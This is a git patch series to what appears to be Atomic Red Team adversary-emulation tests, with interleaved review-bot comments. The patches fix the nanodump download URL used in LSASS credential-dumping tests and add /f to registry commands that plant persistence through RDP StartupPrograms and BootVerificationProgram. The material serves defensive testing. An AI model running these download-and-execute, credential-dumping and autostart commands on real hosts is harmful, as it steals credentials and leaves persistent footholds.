From 7da5d0d1970d6944a285dd3239db242732aed478 Mon Sep 17 00:00:00 2001
From: Retrospected
Date: Mon, 21 Oct 2024 23:30:01 +0200
Subject: [PATCH 1/4] Fix nanodump download url

---
 atomics/T1003.001/T1003.001.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 5b92a022cd..5044450b3d 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
@@ -109,7 +109,7 @@ atomic_tests:
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-      Invoke-WebRequest "https://github.com/fortra/nanodump/blob/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
+      Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
   executor:
     command: |
       PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe -w "%temp%\nanodump.dmp"

From 760f2082b3f9485315af8d7ba6cce87b0dc9abac Mon Sep 17 00:00:00 2001
From: Retrospected
Date: Mon, 21 Oct 2024 23:34:22 +0200
Subject: [PATCH 2/4] Fix nanodump download url

---
 atomics/T1003.001/T1003.001.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1003.001/T1003.001.yaml b/atomics/T1003.001/T1003.001.yaml
index 5044450b3d..9a6123c9ec 100644
--- a/atomics/T1003.001/T1003.001.yaml
+++ b/atomics/T1003.001/T1003.001.yaml
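Review bot: The `/raw/` URL now delivers a real PE, but nothing in the new get_prereq_command checks what actually landed in ExternalPayloads\nanodump.x64.exe before the executor below runs it; pinning the commit fixes which blob the URL names, yet the client has no way to confirm the bytes that came back through the redirect match it, so TLS is the only control. A hash comparison after the Invoke-WebRequest line would make the prerequisite fail closed: `$expected = "<sha256 of dist/nanodump.x64.exe at 2c0b3d5>"` followed by `if ((Get-FileHash "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" -Algorithm SHA256).Hash -ne $expected) { Remove-Item "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"; throw "nanodump hash mismatch" }`. Adding `-ErrorAction Stop` to the Invoke-WebRequest call is also worth considering so a failed request does not fall through and leave a partial file that an existence-only prereq_command would accept; prereq_command itself is outside this hunk, as are the rest of the dependency and executor blocks.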
@@ -422,7 +422,7 @@ atomic_tests:
     get_prereq_command: |
       [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
       New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
-      Invoke-WebRequest "https://github.com/fortra/nanodump/blob/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
+      Invoke-WebRequest "https://github.com/fortra/nanodump/raw/2c0b3d5d59c56714312131de9665defb98551c27/dist/nanodump.x64.exe" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe"
   executor:
     command: |
       PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe --silent-process-exit "#{output_folder}"

From 739b1111d9a4e83c35cafec75e824118ff9de8df Mon Sep 17 00:00:00 2001
From: Retrospected
Date: Sun, 15 Dec 2024 14:43:27 +0100
Subject: [PATCH 3/4] Update T1547.001.yaml

add /f argument to force changing the registry key since it already exists. without /f it will prompt to overwrite
---
 atomics/T1547.001/T1547.001.yaml | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml
index bb0b61f348..4926120531 100644
--- a/atomics/T1547.001/T1547.001.yaml
+++ b/atomics/T1547.001/T1547.001.yaml
@@ -392,8 +392,8 @@ atomic_tests:
       default: calc
   executor:
     command: |
-      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd" /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
-    cleanup_command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd" /v StartupPrograms /t REG_SZ /d "rdpclip"
+      reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd" /f /v StartupPrograms /t REG_SZ /d "#{malicious_app}"
+    cleanup_command: reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd" /f /v StartupPrograms /t REG_SZ /d "rdpclip"
     name: command_prompt
     elevation_required: true
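Review bot: This get_prereq_command is a verbatim copy of the one changed in PATCH 1/4 (same commit pin, same destination file), so the download is again accepted unverified; any SHA256 check added after the Invoke-WebRequest line in the first test, such as `if ((Get-FileHash "PathToAtomicsFolder\..\ExternalPayloads\nanodump.x64.exe" -Algorithm SHA256).Hash -ne $expected) { throw "nanodump hash mismatch" }`, has to be applied here as well or the second test still runs whatever is on disk. Because both tests write to the same ExternalPayloads path, a successful download in one test silently satisfies the other, which masks a failure of this copy; a per-test check, or a single shared helper, would keep them honest. Separately, I believe nanodump's `--silent-process-exit` mode drives LSASS dumping through Image File Execution Options / SilentProcessExit registry keys for lsass.exe; if the cleanup_command (outside this hunk) does not remove those keys the test leaves persistent configuration behind, which is worth confirming against the nanodump source.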
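Review bot: With `/f` the test now overwrites whatever StartupPrograms already held without prompting, but the cleanup_command still writes the hard-coded `rdpclip` instead of the pre-test value, so on a host where an administrator had customised the value (or where it was absent) the cleanup itself changes system state. Capturing the original first keeps cleanup faithful: prepend `reg export "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd" "%temp%\rdpwd.reg" /y` to the command block and use `reg import "%temp%\rdpwd.reg"` as the cleanup_command, which elevation_required already permits. The hunk header advertises eight lines but only seven are visible here, so one context line (probably blank) was lost in this rendering; the enclosing test entry starts above the hunk.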
From 9978a2cad214e71d17236b5f808e64b29e83fa4b Mon Sep 17 00:00:00 2001
From: Retrospected
Date: Sun, 15 Dec 2024 15:12:26 +0100
Subject: [PATCH 4/4] Update T1547.001.yaml

---
 atomics/T1547.001/T1547.001.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/atomics/T1547.001/T1547.001.yaml b/atomics/T1547.001/T1547.001.yaml
index 4926120531..c8de9aa211 100644
--- a/atomics/T1547.001/T1547.001.yaml
+++ b/atomics/T1547.001/T1547.001.yaml
@@ -412,6 +412,6 @@ atomic_tests:
   executor:
     command: |
       reg add HKLM\System\CurrentControlSet\Control\BootVerificationProgram /v ImagePath /t REG_SZ /d "#{malicious_file}"
-    cleanup_command: reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram
+    cleanup_command: reg delete HKLM\System\CurrentControlSet\Control\BootVerificationProgram /f
     name: command_prompt
     elevation_required: true
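Review bot: The `reg add` line directly above the changed cleanup has the same prompt problem PATCH 3/4 fixed for rdpwd: if BootVerificationProgram\ImagePath already exists (for example after a run whose cleanup never executed), reg.exe asks "Value ImagePath exists, overwrite (Yes/No)?" and the test hangs waiting on stdin, so it should read `reg add HKLM\System\CurrentControlSet\Control\BootVerificationProgram /f /v ImagePath /t REG_SZ /d "#{malicious_file}"`. Note also that `reg delete <key> /f` removes the entire key rather than just the ImagePath value; that is the right cleanup only if the key did not exist before the test, and on a host where it legitimately did, scoping the delete with `/v ImagePath` would be safer—I cannot tell from the hunk which assumption the test makes. The enclosing test entry starts above the hunk.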